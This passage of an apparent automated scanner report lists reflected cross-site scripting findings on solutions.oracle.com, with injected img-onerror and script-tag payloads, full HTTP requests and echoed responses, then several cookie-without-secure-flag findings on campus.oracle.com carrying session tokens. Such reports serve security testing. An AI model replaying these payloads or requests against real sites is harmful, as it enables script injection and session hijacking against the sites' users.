Content-Location: /servlet/RepositoryServlet/portal32e1e%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E7b624fc905f/PORTAL.wwv_javascript.fetch_script

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portal32e1e<img src=a onerror=alert(1)>7b624fc905f" not found in URL (http://solutions.oracle.com/portal/pls/portal32e1e<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.14. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwv_setting.render_css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd6fe<img%20src%3da%20onerror%3dalert(1)>5de35f89a4 was submitted in the REST URL parameter 3. This input was echoed as bd6fe<img src=a onerror=alert(1)>5de35f89a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portalbd6fe<img%20src%3da%20onerror%3dalert(1)>5de35f89a4/PORTAL.wwv_setting.render_css?p_lang_type=NOBIDI&p_subscriberid=1&p_styleid=86637&p_siteid=0&p_rctx=R HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://solutions.oracle.com/portal/page/portal/searchresults
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=83490366698,1)
Content-Length: 291
Date: Mon, 17 Oct 2011 12:07:21 GMT
Content-Location: /servlet/RepositoryServlet/portalbd6fe%3Cimg%20src%3Da%20onerror%3Dalert(1)%3E5de35f89a4/PORTAL.wwv_setting.render_css

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portalbd6fe<img src=a onerror=alert(1)>5de35f89a4" not found in URL (http://solutions.oracle.com/portal/pls/portalbd6fe<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.15. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwv_setting.render_custom_css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 77007<img%20src%3da%20onerror%3dalert(1)>e6fca4411c9 was submitted in the REST URL parameter 3. This input was echoed as 77007<img src=a onerror=alert(1)>e6fca4411c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /portal/pls/portal77007<img%20src%3da%20onerror%3dalert(1)>e6fca4411c9/PORTAL.wwv_setting.render_custom_css?p_bg_color=FFFFFF&p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=104965773397,1)
Content-Length: 300
Date: Mon, 17 Oct 2011 12:16:38 GMT
Content-Location: /servlet/RepositoryServlet/portal77007%3Cimg%20src%3Da%20onerror%3Dalert(1)%3Ee6fca4411c9/PORTAL.wwv_setting.render_custom_css

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>DAD "portal77007<img src=a onerror=alert(1)>e6fca4411c9" not found in URL (http://solutions.oracle.com/portal/pls/portal77007<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

3.16. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [p_bg_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/pls/portal/PORTAL.wwv_setting.render_custom_css

Issue detail

The value of the p_bg_color request parameter is copied into the HTML document as plain text between tags. The payload e210d<script>alert(1)</script>a6e14ea0886 was submitted in the p_bg_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/pls/portal/PORTAL.wwv_setting.render_custom_css?p_bg_color=FFFFFFe210d<script>alert(1)</script>a6e14ea0886&p_is_bidi=0&p_version=10.1.4.1.0.113 HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations?p_masterthingid=7668639&p_item_siteid=53&p_pageid=7668625&p_page_siteid=53&p_back_url=http%3A%2F%2Fsolutions.oracle.com%2Fsolutions%2Fbmg%2Fconsulting
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Expires: Wed, 16 Nov 2011 7:14:23 GMT
Content-Type: text/css; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (M;max-age=2592000+0;age=0;ecid=143620341189,1)
Content-Length: 7106
Date: Mon, 17 Oct 2011 12:14:23 GMT
Content-Location: /servlet/RepositoryServlet/portal/PORTAL.wwv_setting.render_custom_css
X-ORACLE-CACHE-INFO1: None
X-ORACLE-CACHE-INFO2: Cache Expires: 43200, Cache Level: SYSTEM
X-ORACLE-CACHE-STATUS: MISS,NEW


.actionButton
{
font-family: Arial,Helvetica,Geneva,sans-serif;
font-size: 0.67em;
color: #000000;
border-color: #EEEEDD;
background-color: #EEEEDD;
}
.BannerTitle
{
font-family: Aria
...[SNIP]...
xt
{
color: #999999;
}
.Highlight
{
font-family: Arial,Helvetica,Geneva,sans-serif;
font-size: 0.67em;
color: #FF0000;
font-weight: bold;
}

.LeftTab {
background-image: url(/images/FFFFFFe210d<script>alert(1)</script>a6e14ea0886tl.gif);
background-repeat: no-repeat;
background-position: left top; }
.RightTab {
background-image: url(/images/FFFFFFe210d<script>
...[SNIP]...

4. SSL cookie without secure flag set  previous  next
There are 36 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/emea-apply%20now.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/emea-apply%20now.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_current-openings.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:15 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 15370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

4.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/emea1-jobs-remove1.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/emea1-jobs-remove1.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/emea-apply%20now.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854988404

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 366566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<style type="text/css">
<!--
a:hover {text-decoration: un
...[SNIP]...

4.3. https://campus.oracle.com/campus/HR/us-calendar.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-calendar.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-calendar.jsp HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=windows-1252
Content-Length: 167256

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

4.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:38:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

4.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-direct.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-profile-direct.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:52 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

4.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://campus.oracle.com
Path:   /campus/HR/us-upload-file.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campus/HR/us-upload-file.jsp?flag=0 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; 